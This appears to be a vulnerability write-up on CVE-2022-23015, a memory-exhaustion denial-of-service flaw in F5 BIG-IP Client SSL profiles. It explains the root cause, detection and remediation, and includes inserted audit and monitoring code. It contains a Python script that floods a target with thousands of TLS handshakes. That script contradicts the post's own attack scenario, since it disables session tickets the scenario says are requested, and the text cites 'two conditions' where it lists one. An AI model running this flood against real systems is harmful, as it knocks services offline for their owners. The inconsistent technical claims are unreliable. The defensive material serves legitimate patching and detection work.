F5's BIG-IP appliances are widely used across enterprises for load balancing, application delivery, and advanced security. In 2022, a notable vulnerability surfaced: CVE-2022-23015, affecting BIG-IP systems with specific SSL configurations. This post explains what the vulnerability is, why it is a problem, and gives the technical detail, along with the real-world impact, a sample exploit script, and useful references.
What is CVE-2022-23015?
CVE-2022-23015 describes a flaw in certain BIG-IP software versions when handling SSL traffic with *Client SSL* profiles where:
- Session Ticket is enabled and configured.
Over time, this problem can cause BIG-IP appliances to slow down or even crash, which might allow an attacker to perform a denial of service (DoS) attack.
Affected versions: 14.1.2.6 up to 14.1.4.4
> ⚠️ If you are running End of Technical Support (EoTS) versions, they are not evaluated but *may* be vulnerable.
Let’s simplify the root cause
- BIG-IP uses OpenSSL/SSL profiles to handle encrypted connections.
- When both client certificates and session tickets are supported, internal memory objects used for managing "sessions" aren’t always released correctly, especially under high SSL connection rates.
- Attackers (or overly aggressive clients) can create many new SSL sessions, causing session objects to pile up in memory.
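The two conditions above, the affected software range and the profile settings, are the first things to check on your own devices. The following is an added example, not code from the post or from F5: it compares a reported version against the range the post lists and flags Client SSL profiles that combine session tickets with client certificate authentication. The profile dictionaries are constructed sample data; the key names `session-ticket` and `peer-cert-mode`, and the `tmsh` remediation syntax, follow tmsh naming as I understand it and are assumptions to verify against F5's documentation before use.

```python
# Added example (not from the post or from F5): audit a BIG-IP against the two
# conditions the post gives, the affected software range and the Client SSL
# profile settings. Profile dicts are constructed sample data; the key names
# 'session-ticket' and 'peer-cert-mode' and the tmsh remediation syntax are
# assumptions to check against F5's own documentation.
from typing import Dict, List, Tuple

Version = Tuple[int, ...]

# Affected range named in the post: 14.1.2.6 up to 14.1.4.4 (treated as inclusive).
AFFECTED_RANGES: List[Tuple[Version, Version]] = [
    ((14, 1, 2, 6), (14, 1, 4, 4)),
]


def parse_version(text: str) -> Version:
    """Turn '14.1.4.2' into (14, 1, 4, 2). Non-numeric components raise ValueError."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if not parts:
        raise ValueError("empty version string")
    return parts


def _pad(v: Version, n: int) -> Version:
    # Right-pad with zeros so '14.1.4' compares as 14.1.4.0.
    return v + (0,) * (n - len(v))


def is_affected_version(text: str) -> bool:
    """True if the version falls inside any listed affected range."""
    v = parse_version(text)
    for low, high in AFFECTED_RANGES:
        n = max(len(v), len(low), len(high))
        if _pad(low, n) <= _pad(v, n) <= _pad(high, n):
            return True
    return False


def exposed_profiles(profiles: List[Dict[str, str]]) -> List[str]:
    """Names of Client SSL profiles that pair session tickets with client
    certificate authentication, the combination the post describes."""
    hits = []
    for p in profiles:
        tickets_on = p.get("session-ticket", "disabled") == "enabled"
        cert_auth = p.get("peer-cert-mode", "ignore") in ("request", "require")
        if tickets_on and cert_auth:
            hits.append(p["name"])
    return hits


def remediation_commands(names: List[str]) -> List[str]:
    """tmsh commands that switch session tickets off on each exposed profile,
    the post's fallback when an upgrade is not immediately possible
    (assumed syntax: verify against F5 documentation)."""
    return [f"tmsh modify ltm profile client-ssl {n} session-ticket disabled" for n in names]


def assess(version: str, profiles: List[Dict[str, str]]) -> Dict[str, object]:
    """Combine the version and profile checks into one verdict."""
    exposed = exposed_profiles(profiles)
    affected = is_affected_version(version)
    return {
        "version_affected": affected,
        "exposed_profiles": exposed,
        "at_risk": affected and bool(exposed),
        "remediation": remediation_commands(exposed),
    }


# Constructed sample profiles (hypothetical names and settings).
SAMPLE_PROFILES = [
    {"name": "clientssl-mtls-api", "session-ticket": "enabled", "peer-cert-mode": "require"},
    {"name": "clientssl-public-web", "session-ticket": "enabled", "peer-cert-mode": "ignore"},
    {"name": "clientssl-legacy", "session-ticket": "disabled", "peer-cert-mode": "request"},
]

if __name__ == "__main__":
    for key, value in assess("14.1.4.2", SAMPLE_PROFILES).items():
        print(f"{key}: {value}")
```

Versions with fewer components are right-padded with zeros, so `14.1.4` is treated as `14.1.4.0` and lands inside the range; a version outside the range with matching profiles is reported as not at risk, but the exposed profiles are still listed so you can decide whether to disable tickets anyway.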
Basic Attack Scenario
Imagine an automated tool that keeps making SSL connections, asking for new session tickets each time, and never resuming old ones. The BIG-IP keeps allocating memory for these session objects and never recycles them.
Over time, the buildup looks like this:
1. Client initiates SSL handshake, requests session ticket
2. BIG-IP stores session info in memory
3. Client disconnects, never uses session ticket
4. Repeat steps 1–3 thousands of times (automated)
5. BIG-IP memory fills with expired sessions, eventually fails
Example Attack Script
You can use Python with the ssl and socket libraries to simulate what an attacker might do (for educational purposes):

```python
import socket
import ssl
import time

SERVER_IP = '192.0.2.10'  # Target BIG-IP virtual server (documentation address)
PORT = 443


def launch_memory_dos():
    for i in range(10000):
        try:
            sock = socket.create_connection((SERVER_IP, PORT))
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE
            # OP_NO_TICKET stops this client from requesting or presenting a
            # session ticket, so every connection is a full handshake and
            # nothing is ever resumed
            context.options |= ssl.OP_NO_TICKET
            ssock = context.wrap_socket(sock, server_hostname="example.com")
            # Optionally send something
            ssock.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
            ssock.close()
            print(f"Connection {i+1} done")
        except Exception as e:
            print("Error:", e)
        time.sleep(0.01)  # Slow down, but not much


if __name__ == "__main__":
    launch_memory_dos()
```
Disclaimer: Do *not* run this on systems you do not own or have permission to test. This code is for understanding and demonstration purposes only.
Real-World Risk
If your production F5 BIG-IP device is publicly accessible and has these SSL configurations, an unauthenticated attacker could crash it or exhaust its memory, knocking critical apps offline. This makes the bug dangerous for organizations operating high-availability environments.
Detection
- Symptoms: Unexpectedly high memory use, frequent out-of-memory alerts, and SSL traffic crashes or slowdowns.
- Logs: The BIG-IP system may log SSL session errors, memory warnings, or new failures loading the Client SSL profile.
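The symptoms above can be turned into checks that run over periodic samples rather than waiting for an out-of-memory alert. The following is an added example, not code from the post: it fits a growth rate to a series of memory readings and flags sustained, mostly monotonic growth, and separately flags the handshake pattern from the attack scenario (a high rate of new handshakes of which almost none are resumed). All series and counts below are constructed; the sampling interval and thresholds are assumptions to tune to your own baseline.

```python
# Added example (not from the post): turn the post's detection hints, a steadily
# climbing memory footprint and a flood of never-resumed handshakes, into checks
# over periodic samples. All series are constructed; interval and thresholds are
# assumptions to tune against your own baseline.
from typing import Dict, List


def least_squares_slope(ys: List[float]) -> float:
    """Slope of the best-fit line through equally spaced samples (units per sample)."""
    n = len(ys)
    if n < 2:
        return 0.0
    mean_x = (n - 1) / 2
    mean_y = sum(ys) / n
    num = sum((x - mean_x) * (y - mean_y) for x, y in enumerate(ys))
    den = sum((x - mean_x) ** 2 for x in range(n))
    return num / den


def memory_growth_mb_per_hour(samples_mb: List[float], interval_s: float) -> float:
    """Fitted memory growth rate, normalised from per-sample to per-hour."""
    return least_squares_slope(samples_mb) * 3600.0 / interval_s


def leak_suspected(samples_mb: List[float], interval_s: float,
                   min_growth_mb_per_hour: float = 50.0,
                   min_rising_fraction: float = 0.8) -> bool:
    """Flag a leak-like pattern: sustained growth AND most consecutive samples
    rising, so a single spike followed by recovery does not trip the check."""
    if len(samples_mb) < 2:
        return False
    growth = memory_growth_mb_per_hour(samples_mb, interval_s)
    rises = sum(1 for a, b in zip(samples_mb, samples_mb[1:]) if b >= a)
    rising_fraction = rises / (len(samples_mb) - 1)
    return growth >= min_growth_mb_per_hour and rising_fraction >= min_rising_fraction


def resumption_fraction(full_handshakes: int, resumed_handshakes: int) -> float:
    """Share of handshakes that reused an earlier session (1.0 when idle)."""
    total = full_handshakes + resumed_handshakes
    return resumed_handshakes / total if total else 1.0


def handshake_flood_suspected(full_handshakes: int, resumed_handshakes: int,
                              window_s: float, min_rate_per_s: float = 20.0,
                              max_resumption: float = 0.05) -> bool:
    """Flag the post's attack scenario: many new handshakes per second with
    almost no session resumption."""
    rate = full_handshakes / window_s if window_s else 0.0
    return rate >= min_rate_per_s and resumption_fraction(full_handshakes, resumed_handshakes) <= max_resumption


def triage(samples_mb: List[float], interval_s: float,
           full_handshakes: int, resumed_handshakes: int, window_s: float) -> Dict[str, bool]:
    """Both signals together; both true is the strongest indication."""
    leak = leak_suspected(samples_mb, interval_s)
    flood = handshake_flood_suspected(full_handshakes, resumed_handshakes, window_s)
    return {"memory_leak": leak, "handshake_flood": flood, "investigate": leak and flood}


# Constructed sample data: 12 readings of memory in use (MB), five minutes apart.
INTERVAL_S = 300
LEAKING_SERIES = [1200 + 30 * i for i in range(12)]   # climbs 30 MB every sample
HEALTHY_SERIES = [1200, 1240, 1215, 1250, 1210, 1245, 1220, 1255, 1212, 1248, 1218, 1250]

if __name__ == "__main__":
    # Constructed counters for a ten-minute window: 18000 full handshakes, 200 resumed.
    print(triage(LEAKING_SERIES, INTERVAL_S, 18000, 200, 600))
    print(triage(HEALTHY_SERIES, INTERVAL_S, 18000, 12000, 600))
```

The rising-fraction test matters: a load-balancer's memory legitimately jumps during traffic peaks and falls back afterwards, which the slope alone might read as growth over a short window. Requiring most consecutive samples to rise keeps the check aimed at the steady accumulation the post describes.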
References & Further Reading
- F5 Security Advisory (K25105363)
- NIST NVD: CVE-2022-23015
- F5 Public Knowledge Center
Conclusion
CVE-2022-23015 might seem subtle, but it's a classic resource exhaustion bug in a critical layer. Left unpatched, it can turn your company's load balancer into an attacker's plaything. Check your SSL configuration, review your BIG-IP software version, and upgrade as soon as possible; if you can't, turn off session tickets.
If you found this post useful, consider sharing it with your network, especially if you’re running BIG-IP gear!
Timeline
Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 19:00:00 UTC